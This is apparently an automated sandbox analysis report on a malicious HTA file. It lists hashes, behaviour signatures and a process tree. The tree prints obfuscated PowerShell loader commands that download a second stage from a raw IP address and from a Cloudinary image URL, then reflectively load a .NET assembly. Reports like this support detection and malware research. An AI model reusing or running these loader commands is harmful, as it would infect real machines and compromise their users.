Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 06:32
Behavioral task
behavioral1
Sample
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
Resource
win10v2004-20241007-en
General
-
Target
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
-
Size
144KB
-
MD5
920910732ff13da38fab9224e65041d6
-
SHA1
844226d370dc471fa282eaad9e8dabaf59963902
-
SHA256
7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544
-
SHA512
1efe02ba682bd628bacebebe8f283276c1ebc6db3bcc3956c59b840d3677d94a6ca18f95182daf8a5d1587a830b2a2cc69d6a9c31a2672c29f8aa294e19cebf7
-
SSDEEP
768:t1EQuPoGCMum2oum2H5KUJDVUKhCoGVf/Atu360KuBxvmm0wYWzP9k4/k4/k4/kk:tG
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2204 powershell.exe 6 2596 powershell.exe 8 2596 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2204 powershell.exe -
pid Process 2596 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2204 powershell.exe 2596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1708 wrote to memory of 2500 1708 mshta.exe 31 PID 1708 wrote to memory of 2500 1708 mshta.exe 31 PID 1708 wrote to memory of 2500 1708 mshta.exe 31 PID 1708 wrote to memory of 2500 1708 mshta.exe 31 PID 2500 wrote to memory of 2204 2500 cmd.exe 33 PID 2500 wrote to memory of 2204 2500 cmd.exe 33 PID 2500 wrote to memory of 2204 2500 cmd.exe 33 PID 2500 wrote to memory of 2204 2500 cmd.exe 33 PID 2204 wrote to memory of 2664 2204 powershell.exe 34 PID 2204 wrote to memory of 2664 2204 powershell.exe 34 PID 2204 wrote to memory of 2664 2204 powershell.exe 34 PID 2204 wrote to memory of 2664 2204 powershell.exe 34 PID 2664 wrote to memory of 2804 2664 csc.exe 35 PID 2664 wrote to memory of 2804 2664 csc.exe 35 PID 2664 wrote to memory of 2804 2664 csc.exe 35 PID 2664 wrote to memory of 2804 2664 csc.exe 35 PID 2204 wrote to memory of 1268 2204 powershell.exe 37 PID 2204 wrote to memory of 1268 2204 powershell.exe 37 PID 2204 wrote to memory of 1268 2204 powershell.exe 37 PID 2204 wrote to memory of 1268 2204 powershell.exe 37 PID 1268 wrote to memory of 2596 1268 WScript.exe 38 PID 1268 wrote to memory of 2596 1268 WScript.exe 38 PID 1268 wrote to memory of 2596 1268 WScript.exe 38 PID 1268 wrote to memory of 2596 1268 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vu1w6zka.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE255.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE254.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5f4d0fe9038ac68a83d24390bfcbfc0e6
SHA1a0a9df39337cbcb8c9e617de727e42933e893fe6
SHA256a8827c747a8134a05fc15022ed86e6110dd0894eef1a3f1042225c0d50ce0f65
SHA5121ed19a47a17cc0c8a5df84886036f4ef26dc05655e00ec24a5e51e12066550cdd8bd55dc07699452b432999e62c8de6f4fc77b7d689b8f37f1de8555941da557
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD532a8ac5ebf5a4395cb002ad4e7adc750
SHA14747a418ab50d931a8462a906672d9819893a037
SHA256fc44fe241bb7384919367e7f4761d502ac58839934554480ddf04f7192455c08
SHA512193eadcf1fbd44b7249394b0622e7bf9ce3aad534dbe35733616b573489bb7bfa51671515e5fa75594b90f28e989368cad060f6e84cb32c83ede36eb43aff2dd
-
Filesize
7KB
MD523b69700d50fe96d99c3da43427ff4d2
SHA1961035dcc9f6aa68e755173d56807f9ea7204f54
SHA2565fb45fb9367a6ab20b9d1bb595635de40efe3de1df9faad78d81371ba3af4374
SHA5127c2918e80af7f7caa60c6a717cf18514e7989beb67f1e0e78408d866c778b13680d0af34e8a4d7f8ecd8969b2ed132912320b8588fa1e14461a4a73fc04f408f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1CTZSLX05JU5EDSNNX5S.temp
Filesize7KB
MD50590a484e54bbbb0c2d40b674f4f42d0
SHA1c2157e00adf0754d2af297fe67644dc7f013b697
SHA256d76a389a92a743f9de1c62923c0daf7b3616171f2dcb27fb9426a904db863d80
SHA512c2f9d024da5cad09291aeb1fb702b8f0b6cb6b5a8d1f067af02d9aa238dc8d26b1294e1ae043f7ab076c221266b7784d2c79891ac53061d7c5af0e9ca491fa55
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5ec949a3ec8713261706c4cc67781ef3b
SHA122ef39e2acfcba8efe7cd1abca991bc3b4e8728c
SHA2562e1ed123f5ecc9b0f0ae12915e6db45835f3786a6d5267bfa35d3db9c7866aec
SHA512ac5506150bf4c25fd994749e5445c312ddde5b62a173ef0e03aaa6e49e1c2235c46caefcc30b5770da09be4ae9a1066548f3d0438c6cbadf244eb2f61412fb0f
-
Filesize
150KB
MD5622118455f9b3d92190edecb9f5a70e4
SHA1ec47a3f75a1a3e197a2745f75015160da5190d76
SHA256d9b6d65cd5e6206ccb41a4d12a0a1cf8d55de31d786cf085d9632e5eaf66914a
SHA5123af7582cd5b8e7ddd5c23f5477fa3f595fdb851e0b7faf51f167c716b0a50ca4cc6af824b8409ca5745ccc72bc56bbfe201c3b6a7630f04a6e2e84ee248bcf91
-
Filesize
652B
MD5d0cdc60663572f830fa57364a4d389c8
SHA14a2e4ac450aecefe6db02528dc955735e9422a16
SHA2565930809203533107e4e4a9302005b0cd78e2edaa9c1ea4ded34835decfc51940
SHA5123e38cbd08958c023fdaf24b01b316f78c067d24fbdeff10218114a1a9127b65c2e3f1e6260273e7b2dedb868acce84885bec6c5218bb8ddcca4a8c9007964d32
-
Filesize
498B
MD5dcfc222ae4a88432f5653314f96c284c
SHA1f38c92dfe6c331d9eede174861c22b5cb24d1236
SHA25665b8df15d3df5605ff17738e203c4ad07a534be67bbb493d36a5ef1cbff2733e
SHA51275d2ace08f5908213cf61ccc5c378871d0b5ce47e98221e8c49f4f758216ae0a606799064011011d713c0187c2722700f808fe5138a0cd4320870251c70ecaf7
-
Filesize
309B
MD5075285945e3e5b56ce19a311186ea107
SHA15956c9da7609f1b8fd3b68a9f1385629cd2afaff
SHA256310f509786bdf1caccfb724ec6e1bdcb0ec69f914069f88d0a458b0617c92203
SHA51247c07daec212a028f9fab9e9649ebf40f46f942ffabca0dbf960791398643a35ccfbca8bb9dba41a22ccd2617f5da9c518528dc874682a9c62671c689640a852